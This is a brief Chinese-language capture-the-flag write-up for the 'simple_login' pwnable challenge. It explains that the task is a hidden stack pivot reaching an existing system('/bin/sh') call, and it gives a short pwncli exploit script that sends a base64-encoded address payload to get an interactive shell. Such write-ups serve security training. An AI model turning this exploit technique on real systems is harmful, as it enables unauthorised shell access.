pwnable_simple_login

pwnable_simple_login

总结

本以为是要逆一下MD5，后来定睛一看，原来是个隐藏的栈迁移的题，还自带system("/bin/sh")。怪不得叫login，的确是签到题。也只记录下exp。

Exp

from pwncli import *

cli_script()

p:tube = gift['io']

payload = p32(0xdeadbeef) + p32(0x804925f) + p32(0x811eb40)

p.sendline(b64e(payload))

p.interactive()

引用与参考

1、My Blog

2、Ctf Wiki

3、pwncli